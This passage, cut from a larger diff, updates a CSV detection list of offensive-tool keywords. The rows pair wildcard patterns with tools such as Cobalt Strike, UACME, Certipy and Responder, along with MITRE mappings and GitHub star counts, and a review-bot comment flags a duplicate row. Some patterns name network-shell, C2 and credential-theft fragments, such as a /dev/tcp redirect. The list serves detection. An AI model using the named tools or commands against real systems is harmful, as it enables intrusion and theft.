SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*cat ./apache-tomcat-8.5.77/webapps/ROOT/tomcatwar.jsp","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/spring-core-rce","1","0","N/A","N/A","1","54","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z" "*cat > /dev/tcp/127.0.0.1*<*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*catphish.rb*","offensive_tool_keyword","catphish","Generate similar-looking domains for phishing attacks. Check expired domains and their categorized domain status to evade proxy categorization. Whitelisted domains are perfect for your C2 servers. 
Perfect for Red Team engagements.","T1565 - T1566 - T1567 - T1596","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ring0lab/catphish","1","1","N/A","N/A","6","583","131","2018-10-16T12:57:25Z","2016-10-24T22:48:51Z" -"*cb1bf87f2976eb49c5560b16a69c742b39706c48314bcc0bdeeaf545910bd380*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*CB561720-0175-49D9-A114-FE3489C53661*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*cb1bf87f2976eb49c5560b16a69c742b39706c48314bcc0bdeeaf545910bd380*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*CB561720-0175-49D9-A114-FE3489C53661*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" "*CC127443-2519-4E04-8865-A6887658CDE5*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" "*cc2_keystrokes*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*cc2_keystrokes_*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 
Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" 
@@ -8303,17 +8450,17 @@ "*cc2_udp_server*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*cc2FilesColor.*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*cc2ProcessColor.*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" -"*ccac7cdcbd419f3184c3886f5c36669ff9f7714b57a1249e2bb4be07b492c8ac*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*ccache2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*ccache2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - 
T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ccac7cdcbd419f3184c3886f5c36669ff9f7714b57a1249e2bb4be07b492c8ac*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*ccache2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ccache2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*CCHOST=127.0.0.1*/tmp/c2*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*cckuailong/reapoc*","offensive_tool_keyword","reapoc","OpenSource Poc && Vulnerable-Target Storage Box.","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/cckuailong/reapoc","1","1","N/A","N/A","7","629","219","2023-02-06T08:27:09Z","2021-11-28T00:46:27Z" "*CCob/BOF.NET*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" -"*CCob/ThreadlessInject*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","6","552","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" +"*CCob/ThreadlessInject*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","6","553","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" "*cd ./whereami/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","0","N/A","10","10","152","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" -"*cd ffuf*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*cd ffuf*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" "*cd golang_c2*","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" -"*cd inceptor*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense 
Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*cd inceptor*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*cd katoolin3*","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/s-h-3-l-l/katoolin3","1","0","N/A","N/A","4","315","103","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" "*cd koadic*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*cd ligolo*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" 
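Review bot: The `"*ccache2john.py*"` row appears twice with identical fields in this hunk, and the commit refreshes both copies (stars 8293 to 8297) instead of dropping one. If detection rules are generated one per row, the duplicate presumably produces two identical rules, or double-counted hits, for the same John the Ripper helper script; keep a single `"*ccache2john.py*"` row. A uniqueness check on the `keyword` column (possibly together with `metadata_tool`) in whatever job refreshes the GitHub counters would catch the same problem elsewhere in the file.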
@@ -8332,54 +8479,55 @@ "*Cdn-Proxy-Origin*","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","213","25","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" "*cdn-scanner -*","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","213","25","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" "*CE895D82-85AA-41D9-935A-9625312D87D0*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" -"*cef0c644e3203b086519fbb77ccc50589b59d5b9a44adfb72a7f2bc6924e9878*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*cef0c644e3203b086519fbb77ccc50589b59d5b9a44adfb72a7f2bc6924e9878*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*celerystalk*","offensive_tool_keyword","celerystalk","celerystalk helps you automate your network scanning/enumeration process with asynchronous jobs (aka tasks) while retaining full control of which tools you want to run.","T1046 - T1057 - T1082 - T1087 - T1069","TA0001 - TA0007","N/A","N/A","Information Gathering","https://github.com/sethsec/celerystalk","1","0","N/A","N/A","4","389","75","2021-03-24T01:23:11Z","2018-08-13T04:21:37Z" -"*cerbrutus.py*","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","3","290","42","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" -"*Cerbrutus-BruteForcer*","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","3","290","42","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" -"*cert*responder.crt*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" -"*cert*responder.key*","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" -"*certi.py_vulntemplates_output*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*certi_py_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*Certify.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*certipy account *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" -"*certipy auth *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" -"*certipy ca *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" -"*certipy ca -backup*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" -"*certipy cert *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 
T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" -"*certipy find *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*cerbrutus.py*","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","3","291","42","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" +"*Cerbrutus-BruteForcer*","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","3","291","42","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" +"*cert*responder.crt*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*cert*responder.key*","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*certi.py_vulntemplates_output*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*certi_py_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*Certify.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
